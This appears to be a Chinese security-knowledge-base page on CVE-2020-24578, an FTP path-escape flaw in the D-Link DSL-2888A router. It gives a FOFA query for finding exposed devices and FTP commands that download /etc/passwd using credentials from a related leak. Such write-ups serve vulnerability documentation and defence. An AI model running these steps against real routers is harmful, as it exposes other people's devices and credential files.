menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right D-Link chevron_right D-Link DSL-28881A FTP配置错误 CVE-2020-24578.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    D-Link DSL-28881A FTP配置错误 CVE-2020-24578.md
    901 B / 2021-04-15 12:15:19
        # D-Link DSL-28881A FTP配置错误 CVE-2020-24578

## 漏洞描述

D-Link DSL-2888A路由器具有文件共享功能,该功能允许用户通过将外部驱动器插入路由器来与其他网络用户共享文件。然后通过FTP(文件传输协议)共享。但是,FTP服务允许网络用户转义共享文件夹以访问路由器文件系统并下载位于根文件夹中的其他文件。

## 漏洞影响

> [!NOTE]
>
> D-Link DSL-2888A

## FOFA

> [!NOTE]
>
> body="DSL-2888A"

## 漏洞复现

前提为使用 **D-Link DSL-28881A 信息泄露 CVE-2020-24577** 获取FTP凭证

以下提供了下载“ passwd”的示例:
在FTP客户端上使用以下命令以有效的凭据(从Finding-2获得)连接到FTP服务。
使用以下命令导航到根文件夹。

```
ftp xxx.xxx.xxx.xxx
ftp> cd etc 
ftp> get passwd
```

![](image/link-5.png)
    links
    file_download